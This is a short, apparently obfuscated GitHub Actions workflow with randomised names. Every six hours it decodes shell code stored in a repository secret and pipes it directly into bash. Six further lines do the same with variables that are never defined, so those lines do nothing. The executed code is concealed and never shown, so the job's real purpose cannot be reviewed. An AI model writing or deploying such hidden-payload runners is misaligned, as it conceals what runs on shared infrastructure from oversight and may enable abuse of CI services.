name: quanxuanxiangshou
on:
  workflow_dispatch:
  schedule:
    - cron: '49 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: quanxuanxiangshou
        env:
          zcxka5218: ${{ secrets.zcxka5218 }}
        run: |
          echo $zcxka5218 | jq -r .pfqel0 | /bin/bash
          echo $mcfq87 | jq -r .jcwpt6 | /bin/bash
          echo $gze90607 | jq -r .t8369 | /bin/bash
          echo $qn20541 | jq -r .mddo9811 | /bin/bash
          echo $xv0 | jq -r .p81 | /bin/bash
          echo $tybyg653 | jq -r .z0246 | /bin/bash
          echo $inr14672 | jq -r .ibclh63 | /bin/bash

